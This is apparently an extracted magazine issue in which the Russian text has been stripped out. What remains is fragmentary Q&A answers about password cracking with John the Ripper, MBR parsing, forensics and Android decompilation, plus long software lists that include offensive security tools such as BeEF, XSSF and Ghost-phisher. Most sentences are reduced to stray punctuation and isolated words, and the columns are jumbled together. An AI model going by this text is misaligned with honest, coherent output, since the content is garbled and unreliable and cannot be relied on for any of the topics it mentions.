Q: MySQL?
A:
, , noSQL
,

.
HandlerSocket Plugin,


UNITS

,

SQL.

, , ,
750
!

GPU:
OpenCL: NT, raw-MD4, raw-MD5, NSLDAP
raw-SHA1;
CUDA: raw-SHA256, phpass.
John the Ripper,
,
,
ZIP RAR, PDF, SSH-. ighashgpu
(hww.golubev.com/blog).

Q: MBR,
. MBR?
Q:
A: , Android-?
MBR,
Android market Perl- Boot Record
Parsers (www.garykessler.net/software/index.
,
html), :
.
mbrparser DOS/Windows Master
A: . Boot Record (MBR);
bsparser
FAT NTFS.
,
An Examination of
the Standard MBR (bit.ly/kI8AWa).

Q:

. email-.
A:
bulk_extractor
(afflib.org/software/bulk_extractor). C++ , , ,

. , bulk_extractor
,
,

.

HDD, SSD,
, ,
.. , ,
( ,
digital forensics), EXIF , IP/MAC/Email-, URL
..
,

Python.

Q:
MD5 ?
A: , ,
John the Ripper (www.openwall.com/john) ,
.
-


Android ,
- Dalvik Executable
(.dex).
.
dex2jar (code.google.com/p/dex2jar), .dex-
Java-, JD-GUI (java.decompiler.free.fr).
smali (code.google.com/p/smali).
Kivlad (www.matasano.com),
Dalvik- Java-,
.
Ruby
Windows, Linux OS X.

Q: , ,
USB?
A: USB-
, , VMware.
(vmx-)
:
usb.analyzer.enable = TRUE
monitor = "debug"
usb.analyzer.maxLine = 8192
mouse.vusb.enable = FALSE


vmware.log.
,
vsusbanalyser (vusb-analyzer.sourceforge.net/tutorial.html). PCAP-, Ruby vmwusb2pcap.rb (bit.ly/la7Aju).

Q: call- ,
. 0 ,
1 , ..
- ,
?
A: IVR (. Interactive Voice
Response), ,
call-.
.
IVR
Asterisk
(www.asterisk.org).
IVR-
extensions.conf, AGI.
Perl Python,
.
Asterisk ,
.

.
IVR
: bit.ly/lNj26k. ,
, , ,
.

Q:
Google,

,

.
,

?
A: , : Duo Security
(www.duosecurity.com) Symantec's VIP
Authentication Service (www.verisign.com).

,
Mobile-OTP (motp.sourceforge.net). ,
, Java
,
RADIUS- (,
XTRadius), . , Android iPhone
Java- .
,
..z

>Net
Bimoid messenger 1.0.0.48
Bimoid server 1.0.0.36

>>MAC
Adobe Flash Player 10.3.181.34
Audirvana 0.9.4
CandyBar 3.3
Coda 1.7.1
DesktopLyrics 1.3.4
Fluid 1.2
Google Chrome 12.0.742.112
Grep 1.1.9
MenuMeters 1.5
Miro 4.0.2
Opera 11.50
Sequel Pro 0.9.9
Syrinx 2.4.4
Thunderbird 5.0
Transmission 2.32
Tunnelblick 3.2
uTorrent 1.5.4
VirtualBox 4.0.10
WaveMaker 6.3.2

>System
AnyBackup 0.9.1
AxCrypt 1.7.2126
Boomerang 1.0
Defraggler 2.06
Duplicate Commander 2.2
FreeOTFE 5.21
Gpg4win 2.1.0
OSForensics 0.98beta
Pretty Flow 2.0.0.99
VirtualBox 4.0.10

>Security
PAC 3.0.1
del2info 0.1.2

>Net
Empathy 3.0.2
Fetchmail 6.3.20
Firefox 5
Freesa 2.0.0
FtpCube 0.5.1
IPTraf 3.0.0
Mldonkey 3.0.7
Mutt 1.5.21
Net-SNMP 5.7
Opera 11.50
Pidgin 2.9
Quassel 0.7.1
SeaMonkey 2.1
Stunnel 4.38
Thunderbird 5.0
TightVNC 2.0.3
Transmission 2.32
WeeChat 0.3.5

>Devel
amysql 1.1
Anjuta IDE 3.0.3.0
ChiliProject 2.0.0
CImg 1.4.9
Clutter 1.6.16
Eclipse 3.7 Indigo
EKOPath 4
Eric5 5.1.4
libpng 1.5.4
Linguist
Mercurial 1.9
nVidia CUDA 4.0
Prolog 1.4.0
Python-LDAP 2.4.1
SiteFusion 5.4
SmartGit 2.0.5
SymPy 0.7.0
Tornado 2.0
wxWidgets 2.8.12

>System
Amanda 3.3.0
AMD Catalyst 11.6
CheckInstall 1.6.2
ClamAV 0.97.1
Iat 0.1.7
Krusader 2.0.0
Linux Kernel 2.6.39.3
Midnight Commander 4.7.5.2
muCommander 0.8.5
Nvidia 275.09.07
Systemd 29
Vim 7.3
VirtualBox 4.0.10
Wine 1.2.3
Zsh 4.3.12

>Server
Apache 2.2.19
Apache Solr 3.3
Apache Traffic Server 3.0
BIND 9.8.0
CUPS 1.4.7
DHCP 4.2.1
Lighttpd 1.4.29
MiniDLNA 1.0.20
MySQL 5.5.14
OpenLDAP 2.4.26
OpenSSH 5.8
OpenVPN 2.2.1
Postfix 2.8.4
PostgreSQL 9.0.4
Samba 3.5.9
Sendmail 8.14.5
Squid 3.1.14

Mantra Security Toolkit 0.61


Prey 0.5.3
Vega
sslsniff 0.7
ksymhunter
ZAProxy 1.3.1
Skipfish 1.94b
Burp Suite 1.4
FaceNiff 1.9.4
BeEF 0.4.2.7
Durandal 0.5
XSS-Harvest
bsqlbf-v2 2.7
complemento 0.7.7
DOM Snitch v0.707
Ghost-phisher 1.2
honggfuzz 0.3
JMD 1.61
Kivlad 0.1
Nerve
NIELD 0.11
sniffjoke 0.4.1
XSSF 2.1
$

>Multimedia
BurnAware Free
Clementine 0.7.1
DualMonitorTools 1.8
EncodeHD 1.2.238
Evernote 4.4.2
FreeVDF 1.0.1.7
Hamster Free eBook Converter
IrfanView 4.30
ONVIF Device Manager 9.9.4017
puush for Windows
Stellarium 0.11.0
Winamp Media Player 5.62

>Misc
BatteryInfoView 1.00
BleachBit 0.8.8
Console 2.00b
Dexpot 1.5.11
Eraser 6.0.8
KeePass 1.20
ManicTime 1.5.5
notifu 1.6
PasswordMaker Desktop Edition 0.1
PeaZip 3.8
PureText 2.0
Window On Top
Youtube SRT Downloader

>Security
BinVis
bsqlbf-v2 2.7
DOM Snitch v0.707
JMD 1.61
Kivlad 0.1
mona.py 1.0
MysqlPasswordAuditor 1.0
Nerve
NetworkMiner 1.0
OpenPuff v3.30
ophcrack 3.3.1
The Sleuth Kit 3.2.2
WebSurgery
XSSF 2.1

>>UNIX
>Desktop
Darktable 0.9
DockbarX 0.45
Feh 1.14.2
Flphoto 1.3.1
Hugin 2011.0.0
Icewm 1.3.7
KoverArtist 0.7.5
LilyPond 2.15.4
LiVES 1.4.4
OutWiker 1.3.0
Sawfish 1.8.1
Scribus 1.4.0rc5
Solfege 3.20
Stellarium 0.11.0
Synfig Studio 0.63.00
Traverso 0.49.2
VisIt 2.3
Wmii 3.9.2
)

HEX-:
010 Editorfor Windows 3.2
FlexHEX Editor 2.6
Hex Editor Neo Standard 4.97
Hex EditorNeo Free 4.97
Hiew32 Demo
McAfee FileInsight 2.1
radare2-0.7

Python:
ActivePython Community Edition
2.7.2
DreamPie 1.1.1
Eric5 5.1.4
IronPython 2.7
Jython 2.5.2
Komodo Edit 6.1.1
Komodo IDE 6.1.1
PyPy 1.5
PyScripter 2.4.1
Python 2.7.2
Python 3.2.1
Spyder 2.0.12
Stackless Python for Python 2.7.1
Stackless Python for Python 3.2
Wing IDE 101 4.0.3
Wing IDE 4.0.3

BoxCryptor 1.0
CloseTheDoorSetup 0.2.1
DropboxPortableAHK
dropf 0.2.4
EMCO Remote Console 1.0.1
Instantbird 1.0
Logstalgia 1.0.3
Maryfi
MetroTwit beta
Opera 11.50
PuTTYTabManager 0.11
Thunderbird 5.0
Vistumber v10b5
Win7 MAC Address Changer v1.0
beta
WinDump 3.9.5

>>WINDOWS
>Development
ClickHeat 1.14
FastSharp
UNITS

HTTP://WWW2


Flash HTML5

MIDOMI
www.midomi.com

GOOGLE
SWIFFY
swiffy.googlelabs.com

,
Shazam SoundHound. :
. , (, ), . -
midomi.
. ,
.
, . ! music
fingerprinting!

HTML5 , Flash
. Flash , .
, iPhone iPad
Flash-. ,
Adobe, . ,
Flash SWF HTML5.
- Google Swiffy. SWF 8 ActionScript 2.0,
WebKit (Chrome, Mobile Safari ..).

ADOBE
BROWSERLAB
browserlab.adobe.com

WUNDERLIST
www.wunderlist.com

(
, ),
. Browserlab. ,
Adobe .
,

.
URL .
, ,
, ..
, .

. Wunderlist,
. -, Windows Mac OS X,
Android iPhone/iPad. TODO : - , -. , Wunderlist
,
. , ( github.com/6wunderkinder). , Titanium.
